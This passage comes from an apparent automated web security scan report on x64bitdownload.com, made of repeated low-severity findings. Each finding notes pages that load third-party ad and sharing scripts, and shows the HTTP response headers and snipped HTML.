Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.74. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.75. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.76. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.77. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.78. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.79. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.80. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.81. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.82. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.83. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.84. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.85. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.86. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.87. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.88. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.89. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
